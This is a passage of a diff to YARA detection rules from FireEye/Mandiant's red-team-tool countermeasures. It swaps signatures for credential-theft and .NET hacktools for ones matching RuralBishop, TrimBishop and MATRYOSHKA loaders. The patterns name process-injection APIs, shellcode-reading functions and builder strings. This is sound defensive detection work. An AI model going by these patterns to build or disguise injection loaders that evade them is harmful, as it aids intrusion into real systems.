89 [1-8] F3 A4 [1-24] E8 } + $si1 = "PeekMessageA" fullword + $si2 = "PostThreadMessageA" fullword condition: - ( uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550) and any of them + ( uint16(0)==0x5A4D) and ( uint32( uint32(0x3C))==0x00004550) and @s0[1]<@s1[1] and @s1[1]<@s2[1] and all of them } -rule FIREEYE_RT_Credtheft_MSIL_Wcmdump_1 : FILE +rule FIREEYE_RT_Loader_Win_Generic_17 : FILE { meta: - description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'WCMDump' project." + description = "No description has been set in the source file - FireEye-RT" author = "FireEye" - id = "22796ccb-a01e-59d8-8c3a-6cbb62899940" - date = "2020-12-09" + id = "4e5bf741-c1e3-54af-9580-02925ba6fc6a" + date = "2020-11-25" + date = "2020-11-25" modified = "2020-12-09" reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/UNCATEGORIZED/production/yara/CredTheft_MSIL_WCMDump_1.yar#L4-L15" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/BEACON/supplemental/yara/Loader_Win_Generic_17.yar#L4-L19" license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" - hash = "dd8805d0e470e59b829d98397507d8c2" - logic_hash = "9fbf53e551342695b306b10f30a3fe32dff359bd70e84e1fa1f190772f5dcbe3" + hash = "562ecbba043552d59a0f23f61cea0983" + logic_hash = "5c20472c3af0c5b8c825671b12763900d6a711695ed04661b33cbf442422348d" score = 75 - quality = 73 + quality = 75 tags = "FILE" - rev = 1 + rev = 3 strings: - $typelibguid0 = "21e322f2-4586-4aeb-b1ed-d240e2a79e19" ascii nocase wide + $s0 = { 89 [1-16] FF 15 [4-16] 89 [1-24] E8 [4-16] 89 C6 [4-24] 8D [1-8] 89 [1-4] 89 [1-4] E8 [4-16] 89 [1-8] E8 [4-24] 01 00 00 00 [1-8] 89 [1-8] E8 [4-64] 8A [1-8] 88 } + $s1 = { 83 EC [1-16] 04 00 00 00 [1-24] 00 30 00 00 [1-24] FF 15 [4-16] EB [16-64] 20 00 00 00 [0-8] FF 15 [4-32] C7 44 24 ?? 00 00 00 00 [0-8] C7 44 24 ?? 00 00 00 00 [0-16] FF 15 } + $si1 = "fread" fullword + $si2 = "fwrite" fullword condition: - ( uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550) and any of them + ( uint16(0)==0x5A4D) and ( uint32( uint32(0x3C))==0x00004550) and all of them } -rule FIREEYE_RT_APT_Hacktool_MSIL_DNSOVERHTTPS_C2_1 : FILE +rule FIREEYE_RT_Loader_MSIL_Ruralbishop_3 : FILE { meta: - description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public 'DoHC2' External C2 project." + description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public RuralBishop project." author = "FireEye" - id = "ee71be6c-e3c8-5365-9f32-157f00066c49" + id = "55a060ef-74e2-50d9-9090-558aaa04d97d" date = "2020-12-09" modified = "2020-12-09" reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/UNCATEGORIZED/production/yara/APT_HackTool_MSIL_DNSOVERHTTPS_C2_1.yar#L4-L16" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/TRIMBISHOP/production/yara/Loader_MSIL_RuralBishop_3.yar#L4-L15" license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" - hash = "dd8805d0e470e59b829d98397507d8c2" - logic_hash = "a482161bbd8e249977f28466ff1381d4693495f8b8ccd9183ae4fde1ec1471eb" + hash = "09bdbad8358b04994e2c04bb26a160ef" + logic_hash = "a4c55dede432c249e36e96ca09555448b0343969d389bfdb4bd459fe34e05ea1" score = 75 - quality = 71 + quality = 73 tags = "FILE" - rev = 2 + rev = 3 strings: - $typelibguid0 = "5d9515d0-df67-40ed-a6b2-6619620ef0ef" ascii nocase wide - $typelibguid1 = "7266acbb-b10d-4873-9b99-12d2043b1d4e" ascii nocase wide + $typelibguid1 = "FE4414D9-1D7E-4EEB-B781-D278FE7A5619" ascii nocase wide condition: - ( uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550) and any of them + ( uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550) and $typelibguid1 } -rule FIREEYE_RT_APT_Hacktool_MSIL_REDTEAMMATERIALS_1 : FILE +rule FIREEYE_RT_APT_Loader_MSIL_TRIMBISHOP_2 : FILE { meta: - description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'red_team_materials' project." + description = "No description has been set in the source file - FireEye-RT" author = "FireEye" - id = "272cd3e9-884a-566b-ae90-4a79ee726a8d" - date = "2020-12-09" + id = "90ee2569-2e68-517b-b2d7-8c4015d92683" + date = "2020-12-03" + date = "2020-12-03" modified = "2020-12-09" reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/UNCATEGORIZED/production/yara/APT_HackTool_MSIL_REDTEAMMATERIALS_1.yar#L4-L16" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/TRIMBISHOP/production/yara/APT_Loader_MSIL_TRIMBISHOP_2.yar#L4-L22" license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" - hash = "dd8805d0e470e59b829d98397507d8c2" - logic_hash = "ca54a1e8335c4256295fc643f5d31eae2e89f020dc7a9b571c4772edaad08022" + hash = "c0598321d4ad4cf1219cc4f84bad4094" + logic_hash = "4cccfca0c06954105f762066741b6c35599a6c28df8b7c255a2659059169578f" score = 75 - quality = 71 + quality = 75 tags = "FILE" - rev = 3 + rev = 1 strings: - $typelibguid0 = "86c95a99-a2d6-4ebe-ad5f-9885b06eab12" ascii nocase wide - $typelibguid1 = "e06f1411-c7f8-4538-bbb9-46c928732245" ascii nocase wide + $ss1 = "\x00NtMapViewOfSection\x00" + $ss2 = "\x00NtOpenProcess\x00" + $ss3 = "\x00NtAlertResumeThread\x00" + $ss4 = "\x00LdrGetProcedureAddress\x00" + $ss5 = "\x2f(\x00?\x00i\x00)\x00(\x00-\x00|\x00-\x00-\x00|\x00/\x00)\x00(\x00i\x00|\x00I\x00n\x00j\x00e\x00c\x00t\x00)\x00$\x00" + $ss6 = "\x2d(\x00?\x00i\x00)\x00(\x00-\x00|\x00-\x00-\x00|\x00/\x00)\x00(\x00c\x00|\x00C\x00l\x00e\x00a\x00n\x00)\x00$\x00" + $tb1 = "\x00DTrim.Execution.DynamicInvoke\x00" condition: - ( uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550) and any of them + ( uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550) and all of them } -rule FIREEYE_RT_APT_Hacktool_MSIL_PRAT_1 : FILE +rule FIREEYE_RT_APT_Loader_MSIL_TRIMBISHOP_1 : FILE { meta: - description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'prat' project." + description = "No description has been set in the source file - FireEye-RT" author = "FireEye" - id = "4a876eb0-ed2f-5ef2-a9b3-ba728b07c8c0" - date = "2020-12-09" + id = "1a3f4247-25f4-51ca-b881-209c0753b915" + date = "2020-12-03" + date = "2020-12-03" modified = "2020-12-09" reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/UNCATEGORIZED/production/yara/APT_HackTool_MSIL_PRAT_1.yar#L4-L18" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/TRIMBISHOP/production/yara/APT_Loader_MSIL_TRIMBISHOP_1.yar#L4-L22" license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" - hash = "dd8805d0e470e59b829d98397507d8c2" - logic_hash = "d707f017b56b0a873f1edca085ad40fc70cb24e8c9844f377bc28871a941d0b4" + hash = "e91670423930cbbd3dbf5eac1f1a7cb6" + logic_hash = "f020efff58c8b7761d700c662c422a9e1ffdf8fe5f6648e421b7c257e3b8d078" score = 75 - quality = 67 + quality = 75 tags = "FILE" - rev = 3 + rev = 1 strings: - $typelibguid0 = "7d1219fb-a954-49a7-96c9-df9e6429a8c7" ascii nocase wide - $typelibguid1 = "bc1157c2-aa6d-46f8-8d73-068fc08a6706" ascii nocase wide - $typelibguid2 = "c602fae2-b831-41e2-b5f8-d4df6e3255df" ascii nocase wide - $typelibguid3 = "dfaa0b7d-6184-4a9a-9eeb-c08622d15801" ascii nocase wide + $sb1 = { 28 [2] 00 06 0A 06 7B [2] 00 04 [12-64] 06 7B [2] 00 04 6E 28 [2] 00 06 0B 07 7B [2] 00 04 [12-64] 0? 7B [2] 00 04 0? 7B [2] 00 04 0? 7B [2] 00 04 6E 28 [2] 00 06 0? 0? 7B [2] 00 04 [12-80] 0? 7B [2] 00 04 1? 0? 7B [2] 00 04 } + $sb2 = { 0F ?? 7C [2] 00 04 28 [2] 00 0A 8C [2] 00 01 [20-80] 28 [2] 00 06 0? 0? 7E [2] 00 0A 28 [2] 00 0A [12-80] 7E [2] 00 0A 13 ?? 0? 7B [2] 00 04 28 [2] 00 0A 0? 28 [2] 00 0A 58 28 [2] 00 0A 13 [1-32] 28 [2] 00 0A [0-32] D0 [2] 00 02 28 [2] 00 0A 28 [2] 00 0A 74 [2] 00 02 } + $ss1 = "\x00NtMapViewOfSection\x00" + $ss2 = "\x00NtOpenProcess\x00" + $ss3 = "\x00NtAlertResumeThread\x00" + $ss4 = "\x00LdrGetProcedureAddress\x00" + $tb1 = "\x00DTrim.Execution.DynamicInvoke\x00" condition: - ( uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550) and any of them + ( uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550) and (@sb1[1]<@sb2[1]) and ( all of ($ss*)) and ( all of ($tb*)) } -rule FIREEYE_RT_APT_Hacktool_MSIL_SHARPNFS_1 : FILE +rule FIREEYE_RT_Loader_MSIL_Trimbishop_1 : FILE { meta: - description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'sharpnfs' project." + description = "This rule looks for .NET PE files that have the string 'msg' more than 60 times as well as numerous function names unique to or used by the TrimBishop tool. All strings found in RuralBishop are reversed in TrimBishop and stored in a variable with the format 'msg##'. With the exception of 'msg', 'DTrim', and 'ReverseString' the other strings referenced in this rule may be shared with RuralBishop." author = "FireEye" - id = "b9d1b4e8-644a-5611-85e8-a124f915b443" + id = "4d58f0a2-bf16-584c-8e92-c8ef54427767" date = "2020-12-09" modified = "2020-12-09" reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/UNCATEGORIZED/production/yara/APT_HackTool_MSIL_SHARPNFS_1.yar#L4-L15" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/TRIMBISHOP/production/yara/Loader_MSIL_TrimBishop_1.yar#L4-L26" license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" - hash = "dd8805d0e470e59b829d98397507d8c2" - logic_hash = "e7f9883376b153849970599d9ecc308882eb86a67834cfd8ab06b44539346125" + hash = "09bdbad8358b04994e2c04bb26a160ef" + logic_hash = "018e87542301db22c384fda2709e8d49711c0fa041d1ef591f98ee7a70dbb677" score = 75 - quality = 73 + quality = 50 tags = "FILE" rev = 3 strings: - $typelibguid0 = "9f67ebe3-fc9b-40f2-8a18-5940cfed44cf" ascii nocase wide + $msg = "msg" ascii wide + $msil = "_CorExeMain" ascii wide + $str1 = "RuralBishop" ascii wide + $str2 = "KnightKingside" ascii wide + $str3 = "ReadShellcode" ascii wide + $str4 = "ReverseString" ascii wide + $str5 = "DTrim" ascii wide + $str6 = "QueensGambit" ascii wide + $str7 = "Messages" ascii wide + $str8 = "NtQueueApcThread" ascii wide + $str9 = "NtAlertResumeThread" ascii wide + $str10 = "NtQueryInformationThread" ascii wide condition: - ( uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550) and any of them + ( uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550) and $msil and #msg>60 and all of ($str*) } -rule FIREEYE_RT_APT_Hacktool_MSIL_SHARPTEMPLATE_1 : FILE +rule FIREEYE_RT_Loader_MSIL_RURALBISHOP_1 : FILE { meta: - description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'sharptemplate' project." + description = "No description has been set in the source file - FireEye-RT" author = "FireEye" - id = "0ca9a13c-e0a0-588b-be13-5954b17d95b1" - date = "2020-12-09" + id = "1b5f1f39-9fa2-5940-8da3-03808e4b7a5d" + date = "2020-12-03" + date = "2020-12-03" modified = "2020-12-09" reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/UNCATEGORIZED/production/yara/APT_HackTool_MSIL_SHARPTEMPLATE_1.yar#L4-L15" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/TRIMBISHOP/new/yara/Loader_MSIL_RURALBISHOP_1.yar#L4-L22" license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" - hash = "dd8805d0e470e59b829d98397507d8c2" - logic_hash = "9746c1ab7b945d311c53fbdf95993d255369e06b23a3279c9f2e8a4df73ab63c" + hash = "e91670423930cbbd3dbf5eac1f1a7cb6" + logic_hash = "f2244c6761639c1162a77a5e82296903c3cc21fbf46d262c779c5e4d6a2ef937" score = 75 - quality = 73 + quality = 75 tags = "FILE" - rev = 2 + rev = 1 strings: - $typelibguid0 = "e9e452d4-9e58-44ff-ba2d-01b158dda9bb" ascii nocase wide + $sb1 = { 28 [2] 00 06 0A 06 7B [2] 00 04 [12-64] 06 7B [2] 00 04 6E 28 [2] 00 06 0B 07 7B [2] 00 04 [12-64] 0? 7B [2] 00 04 0? 7B [2] 00 04 0? 7B [2] 00 04 6E 28 [2] 00 06 0? 0? 7B [2] 00 04 [12-80] 0? 7B [2] 00 04 1? 0? 7B [2] 00 04 } + $sb2 = { 0F ?? 7C [2] 00 04 28 [2] 00 0A 8C [2] 00 01 [20-80] 28 [2] 00 06 0? 0? 7E [2] 00 0A 28 [2] 00 0A [12-80] 7E [2] 00 0A 13 ?? 0? 7B [2] 00 04 28 [2] 00 0A 0? 28 [2] 00 0A 58 28 [2] 00 0A 13 [1-32] 28 [2] 00 0A [0-32] D0 [2] 00 02 28 [2] 00 0A 28 [2] 00 0A 74 [2] 00 02 } + $ss1 = "\x00NtMapViewOfSection\x00" + $ss2 = "\x00NtOpenProcess\x00" + $ss3 = "\x00NtAlertResumeThread\x00" + $ss4 = "\x00LdrGetProcedureAddress\x00" + $tb1 = "\x00SharpSploit.Execution.DynamicInvoke\x00" condition: - ( uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550) and any of them + ( uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550) and (@sb1[1]<@sb2[1]) and ( all of ($ss*)) and ( all of ($tb*)) } -rule FIREEYE_RT_APT_Hacktool_MSIL_SHARPDNS_1 : FILE +rule FIREEYE_RT_Loader_MSIL_RURALBISHOP_2 : FILE { meta: - description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'sharpdns' project." + description = "No description has been set in the source file - FireEye-RT" author = "FireEye" - id = "db6b45be-f42f-5d0f-b50a-32e7a2cbfce6" - date = "2020-12-09" + id = "3befb3f2-81d1-5db2-84d9-773158b9837c" + date = "2020-12-03" + date = "2020-12-03" modified = "2020-12-09" reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/UNCATEGORIZED/production/yara/APT_HackTool_MSIL_SHARPDNS_1.yar#L4-L15" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/TRIMBISHOP/new/yara/Loader_MSIL_RURALBISHOP_2.yar#L4-L22" license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" - hash = "dd8805d0e470e59b829d98397507d8c2" - logic_hash = "bab36f9b1532c3b24c2aea2907006820ed7cf1c90dae7a8138962e14ac9eff55" + hash = "e91670423930cbbd3dbf5eac1f1a7cb6" + logic_hash = "0467532d643cf0200c6561b0724c884230892bf59db163c311b7d4f8acbb63d6" score = 75 - quality = 73 + quality = 75 tags = "FILE" - rev = 2 + rev = 1 strings: - $typelibguid0 = "d888cec8-7562-40e9-9c76-2bb9e43bb634" ascii nocase wide + $ss1 = "\x00NtMapViewOfSection\x00" + $ss2 = "\x00NtOpenProcess\x00" + $ss3 = "\x00NtAlertResumeThread\x00" + $ss4 = "\x00LdrGetProcedureAddress\x00" + $ss5 = "\x2f(\x00?\x00i\x00)\x00(\x00-\x00|\x00-\x00-\x00|\x00/\x00)\x00(\x00i\x00|\x00I\x00n\x00j\x00e\x00c\x00t\x00)\x00$\x00" + $ss6 = "\x2d(\x00?\x00i\x00)\x00(\x00-\x00|\x00-\x00-\x00|\x00/\x00)\x00(\x00c\x00|\x00C\x00l\x00e\x00a\x00n\x00)\x00$\x00" + $tb1 = "\x00SharpSploit.Execution.DynamicInvoke\x00" condition: - ( uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550) and any of them + ( uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550) and all of them } -rule FIREEYE_RT_Credtheft_MSIL_Credsnatcher_1 : FILE +rule FIREEYE_RT_APT_Loader_Win_MATRYOSHKA_1 : FILE { meta: - description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'CredSnatcher' project." + description = "matryoshka_process_hollow.rs" author = "FireEye" - id = "0d8f7495-4748-577d-8ef2-ccc4829fc165" - date = "2020-12-09" + id = "c07fb67e-ded5-593d-b5dc-d0e2c3b5a352" + date = "2020-12-02" + date = "2020-12-02" modified = "2020-12-09" reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/UNCATEGORIZED/production/yara/CredTheft_MSIL_CredSnatcher_1.yar#L4-L15" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/MATRYOSHKA/production/yara/APT_Loader_Win_MATRYOSHKA_1.yar#L4-L24" license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" - hash = "dd8805d0e470e59b829d98397507d8c2" - logic_hash = "2c86be1bcf29bcb2c167f9248dee0ab4a5a5c6740fb1f18784ee2e380176df91" + hash = "44887551a47ae272d7873a354d24042d" + logic_hash = "8f762684ffd3984630bf41ededa78b8993b53b22591a59912cabfe635775de53" score = 75 - quality = 73 + quality = 75 tags = "FILE" rev = 1 strings: - $typelibguid0 = "370b4d21-09d0-433f-b7e4-4ebdd79948ec" ascii nocase wide + $s1 = "ZwQueryInformationProcess" fullword + $s2 = "WriteProcessMemory" fullword + $s3 = "CreateProcessW" fullword + $s4 = "WriteProcessMemory" fullword + $s5 = "\x00Invalid NT Signature!\x00" + $s6 = "\x00Error while creating and mapping section. NTStatus: " + $s7 = "\x00Error no process information - NTSTATUS:" + $s8 = "\x00Error while erasing pe header. NTStatus: " condition: - ( uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550) and any of them + ( uint16(0)==0x5A4D) and ( uint32( uint32(0x3C))==0x00004550) and ( uint16( uint32(0x3C)+0x18)==0x020B) and all of them } -rule FIREEYE_RT_APT_Hacktool_MSIL_SHARPDACL_1 : FILE +rule FIREEYE_RT_APT_Loader_Win64_MATRYOSHKA_1 : FILE { meta: - description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'sharpdacl' project." + description = "matryoshka_process_hollow.rs" author = "FireEye" - id = "13f4e3ea-1e36-5fad-9197-66511d6f026a" - date = "2020-12-09" + id = "69919a80-8ed1-5b8c-911a-ceb75570f11f" + date = "2020-12-02" + date = "2020-12-02" modified = "2020-12-09" reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/UNCATEGORIZED/production/yara/APT_HackTool_MSIL_SHARPDACL_1.yar#L4-L15" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/MATRYOSHKA/production/yara/APT_Loader_Win64_MATRYOSHKA_1.yar#L4-L19" license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" - hash = "dd8805d0e470e59b829d98397507d8c2" - logic_hash = "5f44ec5ddded18fb3a9132b469b2fe7ccbffb3f907325485f0f72fe3d6bbfa23" + hash = "44887551a47ae272d7873a354d24042d" + logic_hash = "46e5480dc95ce8b9d8385c2e44a50b21629301535b93833c13cc3db319ac15dd" score = 75 - quality = 73 + quality = 75 tags = "FILE" - rev = 3 + rev = 1 strings: - $typelibguid0 = "b3c17fb5-5d5a-4b14-af3c-87a9aa941457" ascii nocase wide + $sb1 = { 48 8B 45 ?? 48 89 85 [0-64] C7 45 ?? 00 00 00 00 31 ?? E8 [4-64] BA 00 10 00 00 [0-32] 41 B8 04 00 00 00 E8 [4] 83 F8 01 [2-32] BA [4] E8 } + $sb2 = { E8 [4] 83 F8 01 [2-64] 41 B9 00 10 00 00 [0-32] E8 [4] 83 F8 01 [2-32] 3D 4D 5A 00 00 [0-32] 48 63 ?? 3C [0-32] 50 45 00 00 [4-64] 0F B7 [2] 18 81 ?? 0B 01 00 00 [2-32] 81 ?? 0B 02 00 00 [2-32] 8B [2] 28 } + $sb3 = { 66 C7 45 ?? 48 B8 48 C7 45 ?? 00 00 00 00 66 C7 45 ?? FF E0 [0-64] 41 B9 40 00 00 00 [0-32] E8 [4] 83 F8 01 } condition: - filesize <10MB and ( uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550) and any of them + ( uint16(0)==0x5A4D) and ( uint32( uint32(0x3C))==0x00004550) and ( uint16( uint32(0x3C)+0x18)==0x020B) and all of them } -rule FIREEYE_RT_APT_Hacktool_MSIL_SHARPZIPLIBZIPPER_1 : FILE +rule FIREEYE_RT_APT_Builder_PY_MATRYOSHKA_1 { meta: - description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'sharpziplibzipper' project." + description = "No description has been set in the source file - FireEye-RT" author = "FireEye" - id = "392a52be-29ae-58e1-b517-1ab34a1e1fb8" - date = "2020-12-09" + id = "0135f3bb-28b3-5fc4-85a2-b12c46c8bc45" + date = "2020-12-02" + date = "2020-12-02" modified = "2020-12-09" reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/UNCATEGORIZED/production/yara/APT_HackTool_MSIL_SHARPZIPLIBZIPPER_1.yar#L4-L15" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/MATRYOSHKA/production/yara/APT_Builder_PY_MATRYOSHKA_1.yar#L4-L22" license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" - hash = "dd8805d0e470e59b829d98397507d8c2" - logic_hash = "19354edb91a0d79fdf79437f7247bcf155514db40340af91a3320b556dc2e4c2" + hash = "25a97f6dba87ef9906a62c1a305ee1dd" + logic_hash = "71b26f4b319429ac356b55d22bccd1da85894d61f8c96452422de78d2d893420" score = 75 - quality = 73 - tags = "FILE" - rev = 3 + quality = 75 + tags = "" + rev = 1 strings: - $typelibguid0 = "485ba350-59c4-4932-a4c1-c96ffec511ef" ascii nocase wide + $s1 = ".pop(0)])" + $s2 = "[1].replace('unsigned char buf[] = \"'" + $s3 = "binascii.hexlify(f.read()).decode(" + $s4 = "os.system(\"cargo build {0} --bin {1}\".format(" + $s5 = "shutil.which('rustc')" + $s6 = "~/.cargo/bin" + $s7 = /[\x22\x27]\\\\x[\x22\x27]\.join\(\[\w{1,64}\[\w{1,64}:\w{1,64}[\x09\x20]{0,32}\+[\x09\x20]{0,32}2\]/ condition: - ( uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550) and any of them + all of them } -rule FIREEYE_RT_APT_Hacktool_MSIL_SHARPGOPHER_1 : FILE +rule FIREEYE_RT_APT_Loader_Win64_MATRYOSHKA_2 : FILE { meta: - description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'sharpgopher' project." + description = "matryoshka.rs" author = "FireEye" - id = "cc8eb9cd-9a51-5fab-b0a4-247baaa69dd7" - date = "2020-12-09" + id = "25f916bc-6ee1-5175-903c-4266b0a086e1" + date = "2020-12-02" + date = "2020-12-02" modified = "2020-12-09" reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/UNCATEGORIZED/production/yara/APT_HackTool_MSIL_SHARPGOPHER_1.yar#L4-L15" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/MATRYOSHKA/production/yara/APT_Loader_Win64_MATRYOSHKA_2.yar#L4-L20" license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" - hash = "dd8805d0e470e59b829d98397507d8c2" - logic_hash = "ac37f77440cb76d7dafa4c9b4130471ca6ca760f6d72691db9ebb8cbaaad0c58" + hash = "7f8102b789303b7861a03290c79feba0" + logic_hash = "daa6f6d526bf959c268b2c5a4cae33307cfec5e9ca51283131bbfa66a582b505" score = 75 - quality = 73 + quality = 75 tags = "FILE" - rev = 2 + rev = 1 strings: - $typelibguid0 = "83413a89-7f5f-4c3f-805d-f4692bc60173" ascii nocase wide + $sb1 = { 4D [2] 00 49 [2] 08 B? 02 00 00 00 31 ?? E8 [4] 48 89 ?? 48 89 ?? 4C 89 ?? 49 89 ?? E8 [4] 4C 89 ?? 48 89 ?? E8 [4] 83 [2] 01 0F 84 [4] 48 89 ?? 48 8B [2] 48 8B [2] 48 89 [5] 48 89 [5] 48 89 [5] 41 B? [4] 4C 89 ?? 31 ?? E8 [4] C7 45 [5] 48 89 ?? 4C 89 ?? E8 [4] 85 C0 } + $sb2 = { 4C [2] 0F 83 [4] 41 0F [3] 01 41 32 [2] 00 48 8B [5] 48 3B [5] 75 ?? 41 B? 01 00 00 00 4C 89 ?? E8 [4] E9 } + $si1 = "CreateToolhelp32Snapshot" fullword + $si2 = "Process32Next" fullword condition: - ( uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550) and any of them + ( uint16(0)==0x5A4D) and ( uint32( uint32(0x3C))==0x00004550) and ( uint16( uint32(0x3C)+0x18)==0x020B) and all of them } -rule FIREEYE_RT_Loader_MSIL_Generic_1 : FILE +rule FIREEYE_RT_APT_Builder_Win64_MATRYOSHKA_1 : FILE { meta: - description = "No description has been set in the source file - FireEye-RT" + description = "matryoshka_pe_to_shellcode.rs" author = "FireEye" - id = 